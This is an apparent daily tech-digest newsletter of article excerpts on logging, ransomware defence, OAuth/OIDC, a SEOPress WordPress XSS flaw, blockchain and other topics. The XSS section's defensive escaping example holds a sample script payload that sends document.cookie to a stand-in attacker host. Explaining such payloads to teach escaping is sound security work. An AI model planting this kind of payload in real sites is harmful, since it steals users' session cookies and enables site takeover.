The interdependency of your microservices-based architecture also complicates logging and makes log aggregation a vital part of a successful approach. Sarah Wells, the technical director at the Financial Times, has overseen her team’s migration of more than 150 microservices to Kubernetes. Ahead of this project, while creating an effective log aggregation system, Wells cited the need for selectively choosing metrics and named attributes that identify the event, along with all the surrounding occurrences happening as part of it. Correlating related services ensures that a system is designed to flag genuinely meaningful issues as they happen. In her recent talk at QCon, she also noted the importance of understanding rate limits when constructing your log aggregation. As she pointed out, when it comes to logs, you often don’t know if you’ve lost a record of something important until it’s too late. A great approach is to implement a process that turns any situation into a request. For instance, the next time your team finds itself looking for a piece of information it deems useful, don’t just fulfill the request; log it for your team’s next process review to see whether you can expand your reporting metrics.
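
A minimal sketch of that advice in practice: emit structured events with a small, deliberately chosen set of named attributes, including a correlation id created at the edge and passed downstream so events from different microservices can be stitched together by the aggregator. Field names and services here are illustrative assumptions.

```python
# Hedged sketch of structured logging with a correlation id for log aggregation.
import json, logging, time, uuid

logging.basicConfig(level=logging.INFO, format="%(message)s")

def log_event(event: str, correlation_id: str, **attrs) -> None:
    record = {"event": event, "correlation_id": correlation_id,
              "timestamp": time.time(), **attrs}
    logging.info(json.dumps(record))

cid = str(uuid.uuid4())   # created at the edge, then passed along with every downstream call
log_event("article.publish.requested", cid, service="cms-api", article_id="abc123")
log_event("article.publish.indexed",   cid, service="search-indexer", duration_ms=42)
```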


How Ready Are You for a Ransomware Attack?

Setting the bar high enough to protect against initial entry is a laudable goal, but also adheres to the law of diminishing returns. This means the focus must shift towards improving how difficult it is for an attacker to move around your environment once they have gotten inside. This phase of the attack often requires some manual control, so identifying and disrupting command and control (C2) channels can pay significant dividends – but realize that only the least sophisticated attacker will reuse the same domains and IPs of a previous attack. So rather than looking for C2 communications via threat intel feeds, your approach needs to be to look for patterns of behavior which look like remote-access trojans (RATs) or hidden tunnels (suspicious forms of beaconing). Barriers to privilege escalation and lateral movement come down to cyber-hygiene related to patching (are there easily accessible exploits for local privilege escalation?), rights management (are accounts granted overly generous privileges?) and network segmentation (is it easy to traverse the network?). Most of the current raft of ransomware attacks have utilized the serial compromise of credentials to move from the initial point-of-entry to more useful parts of the network.
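
To make the "patterns of behavior, not threat-intel lists" idea concrete, one simple beaconing heuristic is to flag hosts whose outbound connections to a destination recur at suspiciously regular intervals. The sketch below is illustrative only; the thresholds are assumptions and real detections would also weigh payload sizes, destinations and working hours.

```python
# Illustrative beaconing check: near-constant intervals between outbound connections.
from statistics import mean, pstdev

def looks_like_beaconing(timestamps: list[float],
                         min_events: int = 6,
                         max_jitter_ratio: float = 0.1) -> bool:
    if len(timestamps) < min_events:
        return False
    gaps = [b - a for a, b in zip(timestamps, timestamps[1:])]
    return pstdev(gaps) / mean(gaps) < max_jitter_ratio   # very low jitter relative to the interval

# Connections every ~300 seconds with tiny jitter look automated; human browsing is far noisier.
conns = [0, 301, 599, 902, 1200, 1503, 1799]
print(looks_like_beaconing(conns))   # True
```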


The rise and fall of merit

Wooldridge identifies Plato’s Republic as the origin of the concept of meritocracy, in which the Athenian philosopher imagined a society run by an intellectual elite, “who have the ability to think more deeply, see more clearly and rule more justly than anyone else.” Crucially, Plato’s ruling class was remade each generation—aristocrats were not assumed to pass on their talents—and it prized women as highly as men. Wooldridge finds meritocratic leanings in other pre-modern societies, including China, which began in the fifth century to use exams to recruit civil servants. But it was the expansion of the state in Europe in the early modern period that saw meritocracy first take root, albeit in a paradoxical way. As states expanded, demand for capable bureaucrats outgrew the ability of the aristocracy to produce them. The solution was to look downward and offer patronage to talented lowborns. Men such as French dramatist Jean Racine; London diarist Samuel Pepys; economist Adam Smith; and Henry VIII’s right-hand man, Thomas Cromwell, were all plucked from obscurity by favoritism. 


Intel Advances Architecture for Data Center, HPC-AI and Client Computing

This x86 core is not only the highest performing CPU core Intel has ever built, but it also delivers a step function in CPU architecture performance that will drive the next decade of compute. It was designed as a wider, deeper and smarter architecture to expose more parallelism, increase execution parallelism, reduce latency and increase general purpose performance. It also helps support large data and large code footprint applications. Performance-core provides a geomean improvement of about 19% across a wide range of workloads over our current 11th Gen Intel® Core™ architecture (Cypress Cove core) at the same frequency. Targeted for data center processors and for the evolving trends in machine learning, Performance-core brings dedicated hardware, including Intel's new Advanced Matrix Extensions (AMX), to perform matrix multiplication operations for an order-of-magnitude performance gain – a nearly 8x increase in artificial intelligence acceleration. This is architected for software ease of use, leveraging the x86 programming model.


A Soft, Wearable Brain–Machine Interface

Being both flexible and soft, the EEG scalp can be worn over hair and requires no gels or pastes to keep in place. The improved signal recording is largely down to the micro-needle electrodes, invisible to the naked eye, which penetrate the outermost layer of the skin. "You won't feel anything because [they are] too small to be detected by nerves," says Woon-Hong Yeo of the Georgia Institute of Technology. In conventional EEG set-ups, he adds, any motion like blinking or teeth grinding by the wearer causes signal degradation. "But once you make it ultra-light, thin, like our device, then you can minimize all of those motion issues." The team used machine learning to analyze and classify the neural signals received by the system and identify when the wearer was imagining motor activity. That, says Yeo, is the essential component of a BMI, to distinguish between different types of inputs. "Typically, people use machine learning or deep learning… We used convolutional neural networks." This type of deep learning is typically used in computer vision tasks such as pattern recognition or facial recognition, and "not exclusively for brain signals," Yeo adds. 


How to proactively defend against Mozi IoT botnet

While the botnet itself is not new, Microsoft’s IoT security researchers recently discovered that Mozi has evolved to achieve persistence on network gateways manufactured by Netgear, Huawei, and ZTE. It does this using clever persistence techniques that are specifically adapted to each gateway’s particular architecture. Network gateways are a particularly juicy target for adversaries because they are ideal as initial access points to corporate networks. Adversaries can search the internet for vulnerable devices via scanning tools like Shodan, infect them, perform reconnaissance, and then move laterally to compromise higher value targets—including information systems and critical industrial control system (ICS) devices in the operational technology (OT) networks. By infecting routers, they can perform man-in-the-middle (MITM) attacks—via HTTP hijacking and DNS spoofing—to compromise endpoints and deploy ransomware or cause safety incidents in OT facilities. In the diagram below we show just one example of how the vulnerabilities and newly discovered persistence techniques could be used together.


CBAP certification: A high-profile credential for business analysts

CBAP is the most advanced of IIBA’s core sequence of credentials for business analysts. It follows the Entry Certificate in Business Analysis (ECBA) and the Certification for Competency in Business Analysis (CCBA). As you might expect, the requirements get more extensive as you climb the ladder: CBAP requires more training, work experience, and knowledge area expertise. AdaptiveUS, a company that offers training for all of IIBA’s certs, breaks down the various requirements, but the important thing to know is that CBAP holders are at the top of the heap; while you don’t need to have the lower-level certs to get your CBAP certification, you should be fairly well established in your career as a BA before you consider it. Like IIBA’s other certs, the CBAP draws from A Guide to the Business Analysis Body of Knowledge, also known as the BABOK Guide. The BABOK Guide is a publication from IIBA that aims to serve as a bible for the business analysis industry, collecting best practices from real-world practitioners. It was first published in 2005 and is continuously updated. 


A Short Introduction to Apache Iceberg

Partitioning reduces query response time in Apache Hive because data is stored in horizontal slices. In Hive, partitions are explicit: they appear as a column and must be given partition values. This approach gives Hive several issues: it cannot validate partition values and so is fully dependent on the writer to produce the correct value; it is 100% dependent on the user to write queries correctly; and working queries are tightly coupled to the table’s partitioning scheme, so the partitioning configuration cannot be changed without breaking queries. Apache Iceberg introduces the concept of hidden partitioning, where reading unnecessary partitions can be avoided automatically. Data consumers that fire the queries don’t need to know how the table is partitioned or add extra filters to their queries. Iceberg partition layouts can evolve as needed. Iceberg can hide partitioning because it does not require user-maintained partition columns. Iceberg produces partition values by taking a column value and optionally transforming it.
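
The sketch below mimics the idea of hidden partitioning only; it is not the Iceberg API. The point is that the table itself stores a transform (here an Iceberg-style `day` transform on a timestamp column) and derives partition values from the data, so writers cannot supply wrong values and readers never add partition filters by hand.

```python
# Conceptual sketch of hidden partitioning: partition values derived from a stored transform.
from datetime import datetime, timezone

def day_transform(ts: datetime) -> str:
    return ts.date().isoformat()               # analogous to Iceberg's `day` transform

table_partition_spec = {"ts": day_transform}    # held as table metadata, not a user-visible column

def partition_for(row: dict) -> dict:
    return {col: fn(row[col]) for col, fn in table_partition_spec.items()}

row = {"ts": datetime(2021, 8, 21, 13, 5, tzinfo=timezone.utc), "event": "click"}
print(partition_for(row))   # {'ts': '2021-08-21'}; derived, never hand-written by the user
```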



Quote for the day:

"Be willing to make decisions. That's the most important quality in a good leader." -- General George S. Patton, Jr.

Daily Tech Digest - August 20, 2021

Identity security: a more assertive approach in the new digital world

Perimeter-based security, where organisations only allow trusted parties with the right privileges to enter and leave, doesn’t suit the modern digitalised, distributed environment of remote work and cloud applications. It’s just not possible to put a wall around a business that’s spread across multiple private and public clouds and on-premises locations. This has led to the emergence of approaches like Zero-Trust – an approach built on the idea that organisations should not automatically trust anyone or anything – and the growth of identity security as a discipline, which incorporates Zero-Trust principles at the scale and complexity required by modern digital business. Zero-Trust frameworks demand that anyone trying to access an organisation’s system is verified every time before access is granted on a ‘least privilege’ basis, which is particularly useful in the context of the growing need to audit machine identities. Typically, they operate by collecting information about the user, endpoint, application, server, policies and all activities related to them and feeding it into a data pool which fuels machine learning (ML).


How Can We Make It Easier To Implant a Brain-Computer Interface?

As for implantable BCIs, so far there are only the Blackrock NeuroPort Array (Utah Array) implant, which also has the largest number of subjects implanted and the longest documented implantation times, and the Stentrode from Synchron, which has just recorded its first two implanted patients. The latter is essentially based on a stent that is inserted into the blood vessels in the brain and used to record EEG-type data (local field potentials (LFPs)). It is a very clever solution and surgical approach, and I do believe that it has great potential for a subset of use cases that do not require the high level of spatial and temporal resolution that our electrodes are offering. I am also looking forward to seeing the device’s long-term performance. Our device records single unit action potentials (i.e., signals from individual neurons) and LFPs with high temporal and spatial resolution and high channel count, allowing significant spatial coverage of the neural tissue. It is implanted by a neurosurgeon who creates a small craniotomy (i.e., opens a small hole in the skull and dura) and inserts the device in the previously determined location by manually placing it in the correct area.


Artificial Intelligence (AI): 4 characteristics of successful teams

In most instances, AI pilot programs show promising results but then fail to scale. Accenture surveys point to 84 percent of C-suite executives acknowledging that scaling AI is important for future growth, but a whopping 76 percent also admit that they are struggling to do so. The only way to realize the full potential of AI is by scaling it across the enterprise. Unfortunately, some AI teams think only in terms of executing a workable prototype to establish proof-of-concept, or at best transform a department or function. Teams that think enterprise-scale at the design stage can go successfully from pilot to enterprise-scale production. They often build and work on ML-Ops platforms to standardize the ML lifecycle and build a factory line for data preparation, cataloguing, model management, AI assurance, and more. AI technologies demand huge compute and storage capacities, which often only large, sophisticated organizations can afford. Because resources are limited, AI access is privileged in most companies. This compromises performance because fewer minds mean fewer ideas, fewer identified problems, and fewer innovations.


Software Testing in the World of Next-Gen Technologies

If there is a technology that has gained momentum during the past decade, it is none other than artificial intelligence. AI offers the potential to mimic human tasks and improve operations through its own intellect, and the logic it brings to business shows scope for productive inferences. However, the benefit of AI can only be achieved by feeding computers with data sets, and this needs the right QA and testing practices. As long as automation testing needs to be implemented to derive results, performance can only be achieved by using the right input data, leading to effective processing. Moreover, the improvement of AI solutions is beneficial not only for other industries but for QA itself, since many testing and quality assurance processes depend on automation technology powered by artificial intelligence. The introduction of artificial intelligence into the testing process has the potential to enable smarter testing. So, testing AI solutions could enable software technologies to develop better reasoning and problem-solving capabilities.


What Makes Agile Transformations Successful? Results From A Scientific Study

The ultimate test of any model is to test it with every Scrum team and every organization. Since this is not practically feasible, scientists use advanced statistical techniques to draw conclusions about the population from a smaller sample of data from that population. Two things are important here. The first is that the sample must be big enough to reliably distinguish effects from the noise that always exists in data. The second is that the sample must be representative enough of the larger population in order to generalize findings to it. It is easy to understand why. Suppose that you’re tasked with testing the purity of the water in a lake. You can’t feasibly check every drop of water for contaminants. But you can sample some of the water and test it. This sample has to be big enough to detect contaminants and small enough to remain feasible. It's also possible that contaminants are not equally distributed across the lake. So it's a good idea to sample and test a bucket of water at various spots from the lake. This is effectively what happens here.


OAuth 2.0 and OIDC Fundamentals for Authentication and Authorization

The main goal of OAuth 2.0 is delegated authorization. In other words, as we saw earlier, the primary purpose of OAuth 2.0 is to grant an app access to data owned by another app. OAuth 2.0 does not focus on authentication, and as such, any authentication implementation using OAuth 2.0 is non-standard. That’s where OpenID Connect (OIDC) comes in. OIDC adds a standards-based authentication layer on top of OAuth 2.0. The Authorization Server in the OAuth 2.0 flows now assumes the role of Identity Server (or OIDC Provider). The underlying protocol is almost identical to OAuth 2.0 except that the Identity Server delivers an Identity Token (ID Token) to the requesting app. The Identity Token is a standard way of encoding the claims about the authentication of the user. We will talk more about identity tokens later. ... For both these flows, the app/client must be registered with the Authorization Server. The registration process results in the generation of a client_id and a client_secret, which must then be configured on the app/client requesting authentication.
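
As a hedged sketch of how the registered client_id is used, the snippet below builds the front half of an OIDC authorization code flow: the client sends the user to the Identity Server's authorize endpoint and requests the `openid` scope, which is what makes an ID Token come back alongside the usual OAuth 2.0 access token. The endpoint URL, client identifier and redirect URI are placeholders, not values from the article.

```python
# Sketch of an OIDC authorization request (authorization code flow, step one).
import secrets
from urllib.parse import urlencode

AUTHORIZE_ENDPOINT = "https://id.example.com/authorize"   # from the provider's discovery document
CLIENT_ID = "my-registered-client"                          # issued at registration, alongside client_secret

def build_authorization_url(redirect_uri: str) -> tuple[str, str]:
    state = secrets.token_urlsafe(16)                       # CSRF protection, checked again on the callback
    params = {
        "response_type": "code",
        "client_id": CLIENT_ID,
        "redirect_uri": redirect_uri,
        "scope": "openid profile email",                    # `openid` turns plain OAuth 2.0 into OIDC
        "state": state,
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}", state

url, state = build_authorization_url("https://app.example.com/callback")
print(url)
```

After the user authenticates, the client exchanges the returned code (plus its client_secret) at the token endpoint and receives both an access token and the ID Token carrying the authentication claims.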


How Biometric Solutions Are Shaping Workplace Security

Today, the corporate world and biometric technology go hand in hand. Companies cannot operate seamlessly without biometrics. Regular security checks just don’t cut it in companies anymore. Since biometric technologies are designed specifically to offer the highest level of security, there is limited to no room when it comes to defrauding these systems. Thus, technologies like ID Document Capture, Selfie Capture, 3D Face Map Creation, etc., are becoming the best way to secure the workplace. Biometric technology allows for specific data collection. It doesn’t just reduce the risk of a data breach but also protects important data in offices. Whether it’s cards, passwords, documents, etc., biometric technology eliminates the need for such hackable security implementations at the workplace. All biometric data like fingerprints, facial mapping, and so on are extremely difficult to replicate. Certain biological characteristics don’t change with time, and that prevents authentication errors. Hence, there’s limited scope for identity replication or mimicry. Customized personal identity access control has become an employee’s right of sorts. 


How to avoid being left behind in today’s fast-paced marketplace

The ability to speed up processes and respond more quickly to a highly dynamic market is the key to survival in today’s competitive business environment. For many large businesses, the ERP system forms a crucial part of the digital core, which is supplemented by best-of-breed applications in areas such as customer experience, supply chain, and asset management. When it comes to digitalisation, organisations will often focus on these applications and the connections between them. However, we often see businesses forget to automate processes in the digital core itself — an oversight that can negatively impact other digitalisation efforts. For example, the ability to analyse demand trends on social media in the customer-focused application can offer valuable insights, but if it takes months for the product data needed to launch a new product variant to be accessed, customer trends are likely to have already moved on. If we look more closely at the process of launching a new product to market, this is a prime example of where digital transformation can be applied to help manufacturers remain agile and respond to market trends more quickly. 


FireEye, CISA Warn of Critical IoT Device Vulnerability

Kalay is a network protocol that helps devices easily connect to a software application. In most cases, the protocol is implemented in IoT devices through a software development kit that's typically installed by original equipment manufacturers. That makes tracking devices that use the protocol difficult, the FireEye researchers note. The Kalay protocol is used in a variety of enterprise IoT and connected devices, including security cameras, but also dozens of consumer devices, such as "smart" baby monitors and DVRs, the FireEye report states. "Because the Kalay platform is intended to be used transparently and is bundled as part of the OEM manufacturing process, [FireEye] Mandiant was not able to create a complete list of affected devices and geographic regions," says Dillon Franke, one of the three FireEye researchers who conducted the research on the vulnerability. FireEye's Mandiant Red Team first uncovered the vulnerability in 2020. If exploited, the flaw can allow an attacker to remotely control a vulnerable device, "resulting in the ability to listen to live audio, watch real-time video data and compromise device credentials for further attacks based on exposed device functionality," the security firm reports.


An Introduction to Blockchain

The distributed ledger created using blockchain technology is unlike a traditional network, because it does not have the central authority common in a traditional network structure. In a traditional structure, decision-making power usually resides with a central authority, which decides on all aspects of the environment, and access to the network and its data is granted by the individual responsible for it. The traditional database structure is therefore controlled through authority. This is not to say that a traditional network structure is not effective; certain business functions may best be managed by a central authority. However, such a network structure is not without its challenges. Transactions take time to process and cost money; they are not validated by all parties, because network participation is limited; and they are prone to error and vulnerable to hacking. Processing transactions in a traditional network structure also requires technical skills. In contrast, the distributed ledger is controlled by rules, not by a central authority. The database is accessible to all members of the network and installed on all the computers that use it, and consensus between members is required to add transactions to the database.
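To make the hash-linking idea concrete, below is a minimal Python sketch of an append-only chain of blocks. It is purely illustrative: the block fields, helper names and toy transactions are assumptions, and the consensus step mentioned above (members agreeing before a transaction is added) is a separate protocol that is not modelled here.

```python
import hashlib
import json
import time

def hash_block(block: dict) -> str:
    """Deterministically hash a block's contents."""
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

# The first ("genesis") block anchors the chain.
chain = [{"index": 0, "timestamp": time.time(), "transactions": [], "prev_hash": "0" * 64}]

def add_block(transactions: list) -> dict:
    """Append a block that commits to the hash of the previous block."""
    block = {
        "index": len(chain),
        "timestamp": time.time(),
        "transactions": transactions,
        "prev_hash": hash_block(chain[-1]),
    }
    chain.append(block)
    return block

def is_valid(chain: list) -> bool:
    """Every block must reference its predecessor's hash; tampering breaks the link."""
    return all(chain[i]["prev_hash"] == hash_block(chain[i - 1]) for i in range(1, len(chain)))

add_block([{"from": "alice", "to": "bob", "amount": 5}])
add_block([{"from": "bob", "to": "carol", "amount": 2}])
print(is_valid(chain))                        # True
chain[1]["transactions"][0]["amount"] = 500   # tamper with history
print(is_valid(chain))                        # False: block 2 no longer matches block 1
```

Because each block commits to the hash of its predecessor, altering any historical transaction invalidates every later link, which is what lets all members of the network detect tampering.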



Quote for the day:

"Nothing is less productive than to make more efficient what should not be done at all." -- Peter Drucker

Daily Tech Digest - August 19, 2021

XSS Bug in SEOPress WordPress Plugin Allows Site Takeover

“The permissions_callback for the endpoint only verified if the user had a valid REST-API nonce in the request,” according to the posting. “A valid REST-API nonce can be generated by any authenticated user using the rest-nonce WordPress core AJAX action.” Depending on what an attacker updates the title and description to, it would allow a number of malicious actions, up to and including full site takeover, researchers said. “The payload could include malicious web scripts, like JavaScript, due to a lack of sanitization or escaping on the stored parameters,” they wrote. “These web scripts would then execute any time a user accessed the ‘All Posts’ page. As always, cross-site scripting vulnerabilities such as this one can lead to a variety of malicious actions like new administrative account creation, webshell injection, arbitrary redirects and more. This vulnerability could easily be used by an attacker to take over a WordPress site.” To protect their websites, users should upgrade to version 5.0.4 of SEOPress. Vulnerabilities in WordPress plugins remain fairly common. 
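The underlying lesson is stack-agnostic: stored, attacker-controllable fields such as a title or description must be escaped (or sanitized) before they are rendered. The sketch below shows the principle in Python; SEOPress itself is a PHP/WordPress plugin, so this is only an analogy, and the example payload is invented.

```python
from html import escape

# Invented attacker-supplied title, stored via an insufficiently protected endpoint.
stored_title = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'

# Vulnerable rendering: the stored value is inserted into the page verbatim,
# so the script runs in the browser of anyone viewing the listing page.
unsafe_html = f"<td>{stored_title}</td>"

# Escaped rendering: the markup becomes inert text and is merely displayed.
safe_html = f"<td>{escape(stored_title)}</td>"

print(unsafe_html)
print(safe_html)
```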


How building a world class SOC can alleviate security team burnout

In the short term, this alert overload means an increased potential for high-risk threats being missed as analysts attempt to slog through as many alerts as possible alongside their other duties. Aside from the immediate security issues, this kind of environment poses some serious long-term problems. The frustrations of burnt-out teams can build to the point where analysts will decide to quit their job in search of less stressful positions. We have found that around half of security personnel are considering changing roles at any given time. Not only will they be taking their experience and skills with them, but the ongoing cyber shortage means finding a replacement may be a long and costly process. A team that spends most of its time trudging through alerts and running to put out security fires will also have very little time left for any higher-level strategic activity. This might include undertaking in-depth risk analysis and establishing improved security strategies and processes. Without this activity, the organization will struggle to keep up with evolving cyber threats.


Security through obscurity no longer works

You might expect that companies would be better off keeping their cards close to their chest. The less hackers know about how a company guards its data, the safer the data becomes, according to this line of thinking. In fact, the opposite is true. Secrecy in cyber security puts everyone at risk: the company, its customers, and its suppliers. Electric vehicles serve as a good example of the value of openness in cyber security. Many models require extremely sophisticated software that has to be updated frequently. For example, Tesla distributes updates to owners at least once per month. To deliver updates, an electric car maker requires worldwide access privileges to the on-board computers on its cars. Naturally, car owners want certainty that this does not expose them to hacking, remote carjackings and shutdowns, or being spied on as they drive. For this reason, makers of electric vehicles need to be extremely open about their cyber security so that owners, or trusted experts, can assess whether the company’s systems offer effective protection. Although they do not themselves manage data, telecom equipment makers take their responsibility in supplying network operators just as seriously as makers of electric cars.


Container Best Practices: What They Are and Why You Should Care

One of the common pitfalls organizations fall into is the misperception that minifying containers is, by itself, container best practice. Without a doubt, an outsized amount of time and energy is spent thinking about reducing the size of a container image (minification), and with good reason: smaller images are safer; faster to push, pull, and scan; and generally less cumbersome in the development lifecycle. That’s why “shrinking a container” has become a common subject for blog posts, video tutorials and Twitter posts. It’s also why the DockerSlim open source project, created and maintained by Kyle Quest, is so popular; it is best known for its ability to automatically create a functionally equivalent but smaller container. Another common tactic for container minification could be described as “The Tale of Two Containers.” In this approach, developers first create a “dev container” comprising all the tools they love to use for development. Then, once development is complete, they convert their “dev containers” into “prod containers,” typically by replacing the “heavy” underlying base image with something lighter and more secure.


What is Today´s Relevance of an Enterprise Architecture Practice?

It seems that, especially in modern tech companies, the importance of the Enterprise Architecture (EA) practice is decreasing; some organizations might even consider it an irrelevant practice. In the following, we analyze where such opinions emerge from. In the later parts of this series, we will provide arguments against that reasoning and an analysis that underpins why this is not the end of Enterprise Architecture as a practice. Enterprise Architecture will, however, go through a transformation towards an adapted set of activities, new priorities, and new required skills. ... Apart from the arguments above, there is an additional observation that is common across many different organizations: the more old-world / legacy IT an organization has, the more important the Enterprise Architects in that organization are. Similarly, in organizations with both old- and new-world IT, Enterprise Architects are responsible for managing the architecture of the old world, but they have little influence on the development of the new-world IT: the digital area.


How computer vision works — and why it’s plagued by bias

Like machine learning overall, computer vision dates back to the 1950s. Without our current computing power and data access, the technique was originally very manual and prone to error. But it did still resemble computer vision as we know it today; the effectiveness of first processing according to basic properties like lines or edges, for example, was discovered in 1959. That same year also saw the invention of a technology that made it possible to transform images into grids of numbers, which incorporated the binary language machines could understand into images. Throughout the next few decades, more technical breakthroughs helped pave the way for computer vision. First, there was the development of computer scanning technology, which for the first time enabled computers to digitize images. Then came the ability to turn two-dimensional images into three-dimensional forms. Object recognition technology that could recognize text arrived in 1974, and by 1982, computer vision really started to take shape. In that same year, one researcher further developed the processing hierarchy, just as another developed an early neural network.
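As a rough illustration of the “grid of numbers” idea and of edge-based processing, here is a small Python sketch using NumPy; the “image” is a synthetic array rather than real data.

```python
import numpy as np

# A tiny synthetic grayscale "image": a dark left half and a bright right half.
image = np.array([
    [10, 10, 10, 200, 200, 200],
    [10, 10, 10, 200, 200, 200],
    [10, 10, 10, 200, 200, 200],
    [10, 10, 10, 200, 200, 200],
], dtype=float)

# A simple horizontal gradient: the difference between neighbouring columns.
# Large values mark vertical edges; flat regions produce zeros.
gradient = np.abs(np.diff(image, axis=1))

print(gradient)
# Only the column where intensity jumps (10 -> 200) responds strongly (190),
# which is exactly the kind of line/edge cue early vision systems relied on.
```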


John Oliver on ransomware attacks: ‘It’s in everyone’s interest to get this under control’

Most ominously, ransomware attacks now threaten numerous internet-connected, “smart” in-home devices, such as thermostats, TVs, ovens or even internet-enabled sex toys, such as a butt plug. Which prompted Oliver to remind his audience “arseholes are like opinions – letting the internet be in charge of yours is a really bad idea”. Oliver was legally obligated to say that the butt plug comes with a physical key for emergencies, “which I’m not sure is completely reassuring – keys do get lost, don’t they? Just picture the last time you searched for keys around your house and now raise the stakes significantly.” The point, he continued, was that the costs of ransomware keep rising as the barrier to entry keeps lowering. The explosion in attacks derives from three main factors. First, ransomware as a service, as in hacking programs sold a la carte, removing the need for technical know-how. “Ideally, no one would launch ransomware attacks,” said Oliver, “but my next preference would be that launching one should require significantly more work than simply clicking ‘add ransomware to cart.’”


IoT could drive adoption of near-premises computing

Strategically, it’s not a major leap to consider near-premises data centers that are hybrid, on premises or cloud-based. However, there are always issues, such as figuring out how to redeploy when you have budget constraints and existing resources that must keep working, and CIOs and infrastructure architects must also find time to reconstruct IT infrastructure for near-premises computing. Crawford said that enterprises adopting near-premises computing can reduce their compute and storage infrastructure TCO by 30% to 50% and eliminate most or all of the capital costs they would typically need to spend on the data center itself, and that these gains can be further compounded by turning capital expenses into operating expenses through new scalable service models. If CIOs can demonstrate these gains in the cost models they prepare for IT budgets, near-premises computing may indeed become a new implementation strategy at the edge. Don’t overlook the resilience that near-premises computing brings. “The performance of near-premises computing rivals that of on-premises computing but also has the capability to add significantly more resilience,” Crawford said.
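To put the quoted economics in concrete terms, here is a back-of-the-envelope calculation in Python. Only the 30% to 50% infrastructure-TCO reduction and the capex-to-opex shift come from the article; every dollar figure is a made-up placeholder.

```python
# Hypothetical annualised figures, for illustration only.
on_prem_infra_tco = 1_000_000   # current compute + storage TCO (assumed)
data_center_capex = 250_000     # capital cost of the data center itself (assumed)

reduction_low, reduction_high = 0.30, 0.50   # range quoted by Crawford

near_prem_best = on_prem_infra_tco * (1 - reduction_high)    # 50% lower
near_prem_worst = on_prem_infra_tco * (1 - reduction_low)    # 30% lower

print(f"Near-premises infrastructure TCO: {near_prem_best:,.0f} to {near_prem_worst:,.0f}")
print(f"Capital cost avoided (shifts to scalable opex): up to {data_center_capex:,.0f}")
```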


Enterprise Architecture for Digital Business: Integrated Transformation Strategies

In order to move forward with DT journeys in this new horizon of the post-pandemic era, practitioners must consider a broader perspective of EA. They must review the impacts and synergies of innovation, disruption, and collaboration with their transformation initiatives. Innovation is not just a new way of developing and deploying business solutions – it is also about delivering tangible business outcomes to customers proactively and consistently. Disruption often leverages innovation to accentuate changes in a business using emerging technology trends. Collaboration harnesses the power of innovation and disruption to enable practitioners to work together and achieve quantifiable business results. It is evident that in this near-post-pandemic era a new horizon of the business world is evolving. Practitioners must navigate rapid change through digital transformation while leveraging a nimble, flexible, and agile enterprise architecture framework that efficiently embraces the essence of innovation, disruption, and collaboration.


What it means to be a Human leader

Listening should be an everyday task. Leaders discover what is on their staff’s mind only by listening, whether that is a set-piece exercise or on an ongoing basis. Charlie Jacobs, the senior partner at London-based law firm Linklaters since 2016, tries to do this by putting himself in places where he can have informal conversations. Back when business travel was commonplace, whenever he arrived in one of Linklaters’ 30 offices around the world, he headed to the gym, not the boardroom, to find out what was going on. Jacobs was no fan of after-hours drinks and preferred a pre-work spinning class that allowed him to mingle with colleagues from all levels while working up a sweat. “I get a different cross-section of people coming, we get a shake or a fruit juice afterwards, and they can see a more down-to-earth side to the senior partner,” he told me. ... Human leaders are focused on making the best use of their time and keeping organizations focused on their mission. They act as executive sponsors to pluck ideas from within their organization and ensure that promising projects make headway.



Quote for the day:

"Inspired leaders move a business beyond problems into opportunities." -- Dr. Abraham Zaleznik